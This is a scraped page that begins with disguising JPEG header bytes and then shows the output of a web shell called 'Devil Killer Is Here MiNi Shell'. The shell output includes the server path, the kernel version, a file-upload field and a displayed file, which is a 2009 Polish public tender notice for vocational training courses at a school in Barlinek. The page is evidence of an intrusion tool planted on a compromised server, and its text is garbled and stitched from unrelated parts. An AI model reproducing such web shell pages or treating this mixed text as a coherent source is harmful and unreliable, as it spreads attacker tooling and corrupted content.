JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090110/3216-N-2009.html

<p class="kh_header"><b>Barlinek: Usługa Szkolenia Zawodowego: Kurs operatora wózków jezdniowych, Kurs spawacza</b><br>
<b>Numer ogłoszenia: 3216 - 2009; data zamieszczenia: 10.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Nr 1 im. kpt. hm. Andrzeja Romockiego "Morro" , ul. Szosowa 2, 74-320 Barlinek, woj. zachodniopomorskie, tel. 095 7461064, faks 095 7461064.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zspnrrbarlinek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa Szkolenia Zawodowego: Kurs operatora wózków jezdniowych, Kurs spawacza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> poniżej 60 000 EURO.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> SPECYFIKACJA ISTOTNYCH WARUNKÓW ZAMÓWIENIA

ZESPÓŁ SZKÓŁ PONADGIMNAZJALNYCH NR 1 
im. kpt. hm. Andrzeja Romockiego Morro
ul. Szosowa 2
74-320 Barlinek
000183041

ZAPRASZA DO ZŁOŻENIA OFERT W POSTĘPOWANIU PROWADZONYM W TRYBIE PRZETARGU NIEOGRANICZONEGO


USŁUGA W ZAKRESIE: SZKOLENIA ZAWODOWEGO

SPIS TREŚCI:

Rozdział I. 	Forma oferty
Rozdział II. 	Zmiana, wycofanie i zwrot ofert
Rozdział III.	Oferty wspólne
Rozdział IV.	Jawność postępowania
Rozdział V.	Wymagane dokumenty potwierdzające spełnienie warunków udziału w    postępowaniu, opis warunków oraz sposób oceny ich spełnienia. Inne dokumenty wymagane w ofercie
Rozdział VI.	Wykonawcy zagraniczni
Rozdział VII.	Termin wykonania zamówienia i gwarancja
Rozdział VIII.      Wyjaśnienia treści siwz i jej modyfikacja oraz sposób porozumiewania się wykonawców z zamawiającym
Rozdział IX.	 Sposób obliczenia oceny oferty
Rozdział X.	Składanie i otwarcie ofert
Rozdział XI.	Wybór oferty najkorzystniejszej
 Rozdział XII.	Podwykonawcy
Rozdział XIII. 	Zawarcie umowy
Rozdział XIV.       Ochrona prawna 
Rozdział XV.	Opis przedmiotu zamówienia.


Załączniki:
	Załącznik nr 1 - oferta cenowa
	Załącznik nr 2 - oświadczenie
	Załącznik nr 3 - wzór kontraktu
                  Załącznik nr 4 - wykaz osób








	









Podstawa prawna: Ustawa z dnia 29.01.2004r. ze zmianami Prawo zamówień publicznych t.j. Dz. U. z 2007r. nr 223, poz. 1655 oraz z 2008r. Nr 171, poz. 1058, zwana dalej ustawą.

ROZDZIAŁ I - Forma oferty

1.	Na ofertę składa się: oferta cenowa oraz wszystkie pozostałe wymagane dokumenty w tym oświadczenia, załączniki itp. zgodnie z rozdziałem V specyfikacji istotnych warunków  zamówienia siwz.
2.	Wykonawcy sporządza oferty zgodnie z wymaganiami siwz.
3.	Oferta cenowa musi być sporządzona na formularzu oferty, według wzoru stanowiącego     załącznik nr 1 do siwz. 
4.	Oferta musi być sporządzona w języku polskim, na maszynie do pisania, komputerze lub ręcznie długopisem. Oferty nieczytelne zostaną odrzucone. 
5.	Oferta musi być podpisana przez osoby upoważnione do składania oświadczeń woli w imieniu wykonawcy. Upoważnienie do podpisania oferty musi być dołączone do oferty, o ile nie wynika ono z innych dokumentów załączonych przez wykonawcę. 
6.	W przypadku, gdy wykonawca składa kopię jakiegoś dokumentu, musi być ona poświadczona za zgodność z oryginałem przez wykonawcę, wykonawca składa własnoręczny podpis poprzedzony dopiskiem za zgodność. Jeżeli do reprezentowania wykonawcy upoważnione są łącznie dwie lub więcej osób, kopie dokumentów muszą być potwierdzone za zgodność z oryginałem przez te osoby. 
7.	Jeżeli któryś z wymaganych dokumentów składanych przez wykonawcę jest sporządzony w języku obcym dokument taki należy złożyć wraz z tłumaczeniem na język polski poświadczonym przez wykonawcę. Dokumenty sporządzone w języku obcym bez wymaganych tłumaczeń nie będą brane pod uwagę.
8.	Zaleca się, aby wszystkie strony ofert były zszyte i ponumerowane. Ponadto, wszelkie miejsca, w których wykonawca naniósł zmiany, muszą być przez niego parafowane. 
9.	Wykonawca składa tylko jedną ofertę. 
10.	 Zamawiający nie dopuszcza składania ofert wariantowych. 
11.	 Oferta musi obejmować całość zamówienia, nie dopuszcza się składania ofert  częściowych. 
12.	 Zamawiający nie przewiduje udzielania zamówień uzupełniających. 
13.	 Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem ofert. 
14.	 Zaleca się, aby wykonawca zamieścił ofertę w zewnętrznej i wewnętrznej kopercie z tym,   że:
1. zewnętrzna koperta powinna być oznaczona w następujący sposób:
zakup: Usługi szkolenia zawodowego: Kurs operatora wózków jezdniowych,   Kurs spawacza oraz  nie otwierać - bez nazwy i pieczątki wykonawcy; 
2.koperta wewnętrzna powinna zawierać ofertę i być zaadresowana na wykonawcę, tak aby można było odesłać ofertę w przypadku jej wpłynięcia po terminie. 
15.	Jeżeli oferta wykonawcy nie będzie oznaczona w sposób wskazany w pkt 14, zamawiający nie będzie ponosić żadnej odpowiedzialności za nieterminowe wpłynięcie ofert.






ROZDZIAŁ II - Zmiana, wycofanie i zwrot oferty

1.	Wykonawca może wprowadzić zmiany oraz wycofać złożoną przez siebie ofertę przed  terminem składania ofert. 
1.w przypadku wycofania oferty, wykonawca składa pisemne oświadczenie, że ofertę swą wycofuje, w zamkniętej kopercie zaadresowanej jak w rozdziale I pkt 14 ppkt 1 pakt dopiskiem wycofanie. 
2.W przypadku zmiany oferty, wykonawca składa pisemne oświadczenie, iż ofertę swą zmienia, określając zakres i rodzaj tych zmian a jeśli oświadczenie o zmianie pociąga za sobą konieczność wymiany czy też przedłożenia nowych dokumentów - wykonawca winien dokumenty te złożyć.
Powyższe oświadczenie i ew. dokumenty należy zamieścić w kopercie wewnętrznej i zewnętrznej, oznaczonych jak w rozdziale I pkt 14 ppkt 1 i 2 przy czym koperta zewnętrzna powinna mieć dopisek zmiany.
2.	Wykonawca nie może wprowadzić zmian do oferty oraz wycofać jej po upływie terminu składania ofert.
3.	Oferty złożone po terminie składania zamawiający zwraca wykonawcom bez otwierania, po upływie terminu do wniesienia protestu.

ROZDZIAŁ III - Oferty wspólne 

1.	Wykonawcy składają ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarciu umowy. 
2.	Pełnomocnictwo, o którym mowa w pkt 1 musi znajdować się w ofercie wspólnej wykonawców. 
3.	Pełnomocnik pozostaje w kontakcie z zamawiającym w toku postępowania; zwraca się do zamawiającego z wszelkimi sprawami i do niego zamawiający kieruje informację, korespondencję, itp.
4.	Oferta wspólna, składana przez dwóch lub więcej wykonawców, powinna spełniać następujące wymagania:
1.oferta wspólna powinna być sporządzona zgodnie z siwz
      2.sposób składania dokumentów w ofercie wspólnej:
a.dokumenty, dotyczące własnej firmy, takie jak np.: odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej,  - składa każdy z wykonawców składających ofertę wspólną w imieniu swojej firmy
b.dokumenty wspólne takie jak np.: oferta cenowa, itp. Składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną,
5.	Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w pkt 1 - 4 niniejszego regulaminu. 
6.	Przed podpisaniem umowy w przypadku wygrania postępowania) wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić zamawiającemu umowę konsorcjum, zawierającą, co najmniej:
1.zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, 
2.określenie zakresu działania, poszczególnych stron umowy, 
3.czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwaranci jakości i rękojmi. 
ROZDZIAŁ IV - Jawność postępowania 

1.	Zamawiający prowadzi protokół postępowania. 
2.	Protokół postępowania wraz z załącznikami jest jawny. Załączniki do protokołu takie jak opinie biegłych, oświadczenia, informacje, zawiadomienia, wnioski, inne dokumenty i informacje składane przez zamawiającego i wykonawców udostępnia się po dokonaniu wyboru najkorzystniejszej oferty lub unieważnienia postępowania. Oferty są jawne od chwili ich otwarcia. 
3.	Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu  nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą one być udostępnione. 
4.	W przypadku zastrzeżenia informacji wykonawca ma obowiązek wydzielić z oferty informacje stanowiące tajemnicę jego przedsiębiorstwa i oznaczyć je klauzulą:  nie udostępnić. Informacje stanowią tajemnicę jego przedsiębiorstwa w rozumieniu art. 11 ust. 4 ustawy o zwalczaniu nieuczciwej konkurencji Dz. U. z 2003 r. nr 153, poz. 1503 z późniejszymi zmianami. 
5.	W sytuacji, gdy wykonawca zastrzeże w ofercie informacje, które nie stanowią tajemnicy przedsiębiorstwa lub są jawne na podstawie przepisów ustawy Prawo zamówień publicznych lub odrębnych przepisów, informacje te będą podlegały udostępnieniu na takich samych zasadach, jak pozostałe niezastrzeżone dokumenty.



ROZDZIAŁ V - Wymagane dokumenty potwierdzające spełnienie warunków udziału w   postępowaniu, opis warunków oraz sposób oceny ich spełnienia. Inne dokumenty wymagane w ofercie. 

1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia,
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, 
2.	Każdy z wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1.Oświadczenie wykonawcy, według wzoru, stanowiącego załącznik nr 2 do niniejszej siwz:
a.	o spełnieniu warunków określonych w art. 11 ust. 1 pkt 1,2,2 ustawy, 
	w przypadku składania ofert wspólnej ww. oświadczenie składa pełnomocnik w imieniu wykonawców składających ofertę wspólną 
b.	o spełnieniu warunków określonych w art. 22 ust. 1 pkt 4 ustawy, 
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną. 
	2.   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
		W przypadku składania ofert wspólnej ww. oświadczenie składa pełnomocnik w imieniu wykonawców składających ofertę wspólną.
	3. Oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom jeżeli  wykonawca przewiduje udział podwykonawców
		W przypadku składania oferty wspólnej należy złożyć jeden dokument
3. Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, dokumentów których mowa w art. 25 ust. 1 ustawy, lub którzy złożyli dokumenty, o których mowa w art. 25. 1, zawierające błędy do ich uzupełnienia w wyznaczonym terminie, chyba że mino ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 

ROZDZIAŁ VI - Wykonawcy zagraniczni

1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w rozdziale V pkt 2 ppkt 2 siwz składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
2.    Dokumenty, o których mowa pkt 1, powinny być wystawione nie wcześniej niż  6   miesięcy przed upływem terminu składania ofert. 
3.   Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o  których mowa w pkt 1 zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt 2 stosuje się odpowiednio. 

ROZDZIAŁ VII - termin wykonania zamówienia i gwarancja. 
 
1.	Termin wykonania zamówienia - do dnia 30 listopada 2009r. 


ROZDZIAŁ VIII - Wyjaśnienia treści SIWZ i jej modyfikacja oraz sposób porozumiewania się wykonawców z zamawiającym

1.	Zamawiający urzęduje w następujących dniach roboczych i godzinach:
           1. od poniedziałku do piątku - od godz. 700 do godz. 1500, 
           
2.   Oświadczenia, wnioski, zawiadomienia oraz informacje zamawiający i wykonawca  przekazuje pisemnie, z zastrzeżeniem pkt 3. 
3.   Zamawiający dopuszcza porozumiewanie się za pomocą faksu, przy przekazaniu następujących dokumentów:
	1. pytania i wyjaśnienia dotyczące treści siwz,
	2. modyfikacje treści siwz 
	3. wniosek o wyjaśnienie i wyjaśnienie treści oferty, 
	   4. wniosek o wyjaśnienie i wyjaśnienie dotyczące oświadczeń i dokumentów,  o których mowa w art. 25 ust. 1 ustawy, 
	   5. wezwanie kierowane do wykonawców na podstawie art. 26 ust. 3 ustawy, 
	   6. informacja o poprawieniu oczywistych omyłek pisarskich oraz omyłek rachunkowych w obliczeniu ceny, 
	   7. wniosek zamawiającego o wyrażenie zgody na przedłużenie terminu związania ofertą oraz odpowiedź wykonawcy, 
	    8. zawiadomienie o wyborze najkorzystniejszej oferty o wykonawcach, którzy zostali z postępowania wykluczeni i wykonawcach, których oferty zostały odrzucone, 

4.  Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. 
5.  Korespondencja przesłana za pomocą faksu po godzinach urzędowania zostanie zarejestrowana w następnym dniu pracy zamawiającego i uznana za wniesioną z datą tego dnia. 
6.	Postępowanie odbywa się w języku polskim w związku z czym wszelkie pisma, dokumenty, oświadczenia itp. składane w trakcie postępowania między zamawiającym a wykonawcami muszą być sporządzone w języku polskim. 
7.	Adres do korespondencji jest zamieszczony na pierwszej stronie niniejszej siwz. Zamawiający wymaga, aby wszelkie pisma związane z postępowaniem były kierowane wyłącznie na ten adres. 
8.	Zamawiający nie zamierza zwoływać zebrania wykonawców. 
9.	Osobą uprawnioną do bezpośredniego kontaktowania się z wykonawcami jest
      p. Kazimierz Siarkiewicz
  10.  Wykonawca może zwrócić się do zamawiającego o wyjaśnienie treści siwz. Zamawiający udzieli niezwłocznie wyjaśnień chyba, że prośba o wyjaśnienie treści siwz wpłynie do niego na mniej niż 6 dni przed terminem składania ofert.
  11.   Treść zapytań wraz z wyjaśnieniami Zamawiający przekazuje wykonawcom, którym   przekazał siwz bez ujawnienia źródła zapytania oraz udostępnia na stronie internetowej. 
  12.   W szczególnie uzasadnionych przypadkach zamawiający może w każdym czasie przed upływem terminu do składania ofert zmodyfikować treść siwz. Dokonaną w ten sposób modyfikację przekazuje się niezwłocznie wszystkim wykonawcom, którym przekazano siwz oraz zamieszcza na stronie internetowej. 
  13.   Zamawiający przedłuży termin składania ofert, jeżeli w wyniku modyfikacji treść siwz niezbędny jest dodatkowo czas na wprowadzenie zmian w ofertach. O przedłużeniu terminu składania ofert zamawiający niezwłocznie zawiadomi wszystkich wykonawców, którym przekazano siwz oraz umieści ją na stronie internetowej. 

ROZDZIAŁ IX - Sposób obliczenia ceny oferty

1.	  Cena powinna obejmować całość zamówienia, podatek VAT oraz wszystkie pozostałe koszty realizacji zamówienia, w szczególności koszty dostawy.
2.	   Rozliczenia między zamawiającymi a wykonawcą będą prowadzone w walucie PLN. 
3.	   Zastosowanie przez wykonawcę stawki podatku VAT od towarów i usług niezgodnej z obowiązującymi przepisami spowoduje odrzucenie oferty.  
4.	   Błąd rachunkowy w obliczeniu ceny, którego nie można poprawić na podstawie art. 88 
Prawa zamówień publicznych spowoduje odrzucenie oferty. 




ROZDZIAŁ X - Składanie i otwarcie ofert 
 
1.	Ofertę należy złożyć w siedzibie Zamawiającego tj. przy ul. Szosowej 2 w Barlinku pok. Nr 1 - Sekretariat 
2.	Za termin złożenia oferty uważa się termin jej wpłynięcia do zamawiającego. 
3.	Oferty będą podlegać rejestracji przez zamawiającego. Każda przyjęta oferta zostanie opatrzona adnotacją określającą dokładny termin przyjęcia oferty tzn. datę kalendarzową oraz godzinę i minutę, w której została przyjęta. Do czasu otwarcia ofert, będą one przechowywane w sposób gwarantujący ich nienaruszalność. 
4.	Otwarcie ofert odbędzie się  w siedzibie zamawiającego tj. przy ul. SZOSOWEJ  2 c pokój nr 15
5.	Postępowanie toczyć się będzie z podziałem na części: jawną i niejawną. 
6.	Zamawiający bezpośrednio przed otwarciem ofert poda kwotę, jaką zamierza przeznaczyć na sfinansowanie zamówienia. Następnie zamawiający otworzy koperty z ofertami i ogłosi nazwę firmę i adres  siedzibę wykonawcy, którego oferta jest otwierana, a także informacje dotyczące ceny oferty, terminu wykonania zamówienia, okresu gwarancji i warunków płatności - zawartych w ofercie. 
7.	Informacje, o których mowa w pkt 8 zamawiający przekaże niezwłocznie wykonawcom, którzy nie byli obecni przy otwarciu ofert, na ich wniosek. 

ROZDZIAŁ XI - Wybór oferty najkorzystniejszej

1.	 Kryterium oceny ofert jest cena, 
2.	Sposób przyznania punktów w kryterium cena:

Cena najniższa
------------------------- x 100 pkt. x znaczenie kryterium 100%
Cena oferty ocenianej
 
      
    
3. Bieg terminu związania ofertą rozpoczyna się z upływem terminu składania ofert. 
4. Zamawiający dokona badania ofert w celu stwierdzenia, czy wykonawcy nie podlegają   wykluczeniu. W przypadku wykluczenia wykonawcy zamawiający odrzuci jego ofertę. Następnie zamawiający dokona oceny, czy oferty wykonawców nie wykluczonych z postępowania nie podlegają odrzuceniu. 
5. W toku badania i oceny ofert zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych ofert i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu. 
6. Zamawiający poprawi w tekście oferty oczywiste omyłki pisarskie oraz omyłki rachunkowe w obliczeniu ceny, niezwłocznie zawiadamiają o tym wszystkich wykonawców, którzy złożyli oferty. 
7. Omyłki rachunkowe w obliczeniu ceny zamawiający poprawi na zasadach określonych w art. 88 ustawy. 
8. Jeżeli oferta zawierać będzie rażąco niską cenę w stosunku do przedmiotu zamówienia, zamawiający zwróci się w formie pisemnej do wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących elementów oferty mających wpływ na wysokość ceny.
9.Cena nie może być niższa od wartości szacunkowej więcej niż 10%. 
10.Zamawiający odrzuci ofertę, jeżeli:
a.	jest niezgodna z ustawą, 
b.	jej treść nie odpowiada treści siwz, 
c.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
d.	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, 
e.	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia, 
f.	zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88, lub błędy w obliczeniu ceny, 
g.	wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny, 
h.	jest nieważna na podstawie odrębnych przepisów. 
11.Oferty nie odrzucone zostaną poddane procedurze oceny zgodnie z kryteriami oceny określonymi w siwz. 
12.	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w siwz. 
13.	Niezwłocznie po wyborze najkorzystniejszej oferty zamawiający zawiadomi wykonawców, którzy złożyli oferty o:
a.	wyborze najkorzystniejszej oferty, podając nazwę firmę i adres tego wykonawcy, którego ofertę wybrano, oraz uzasadnienie jej wyboru, a także nazwy firmy, siedziby i adresy wykonawców, którzy założyli oferty wraz ze streszczeniem oceny i porównania złożonych ofert zawierającym punktację przyznaną ofertom w każdym kryterium oceny ofert i łączną punktację, 
b.	wykonawcach, których oferty zostały odrzucone, podając uzasadnienie faktyczne i prawne, 
c.	wykonawcach, którzy zostali wykluczeni z postępowania, podając uzasadnienie faktyczne i prawne,
14.	W przypadku wystąpienia przesłanek, o których mowa a art. 93 ust. 1 ustawy zamawiający unieważnienia postępowanie. 
15.	O unieważnieniu postępowania zamawiający zawiadomi równocześnie wszystkich wykonawców, którzy:
a.	ubiegali się o udzielenie zamówienia, - w przypadku unieważnienia postępowania przed upływem terminu składania ofert, 
b.	złożyli oferty - w przypadku unieważnienia postępowania po upływie terminu składania ofert - podając uzasadnienie faktyczne i prawne. 
16.	Zamawiający zwróci wykonawcom, których oferty nie zostały wybrane, na ich wniosek, złożone przez nich plany, projekty, rysunki, modele, próbki, wzory, programy komputerowe oraz inne podobne materiały. 


ROZDZIAŁ XII - Podwykonawcy

1.	W przypadku, gdy wykonawca przewidział do wykonania przedmiotu zamówienia udział podwykonawców, ma obowiązek przed podpisaniem umowy z podwykonawcą przedstawić zamawiającemu do zaakceptowania umowy z podwykonawcami. 
2.	Przed końcowym odbiorem robót Wykonawca zobowiązany jest do udokumentowania, iż podwykonawcy otrzymali wynagrodzenie zgodne z zawartą umową. 


ROZDZIAŁ XIII - Zawarcie kontraktu, zabezpieczenie należytego wykonania umowy

1.	Informacje o formalnościach, jakie powinny być spełnione w celu zawarcia umowy. 
a.	Wykonawca, którego oferta została wybrana zobowiązany jest skontaktować się z zamawiającym w terminie 7 dni od daty otrzymania zawiadomienia o wyborze oferty i uzgodnić termin podpisania umowy. 
b.	Wykonawca ma obowiązek zawrzeć umowę zgodnie ze wzorem umowy stanowiącym załącznik nr 3 do niniejszej siwz. 
c.	Zawarta umowa będzie jawna i będzie podlegała udostępnieniu na zasadach określonych w przepisach o dostępie do informacji publicznej art. 139 ust. 3 ustawy.
2.	Termin i miejsce zawarcia umowy. 
Umowa zostanie zawarta w siedzibie zamawiającego, nie wcześniej niż w 8 dniu od dnia przekazania zawiadomienia o wyborze oferty. 
  ROZDZIAŁ IV  Kryterium jest: cena
                              

ROZDZIAŁ XIV - Opis przedmiotu zamówienia

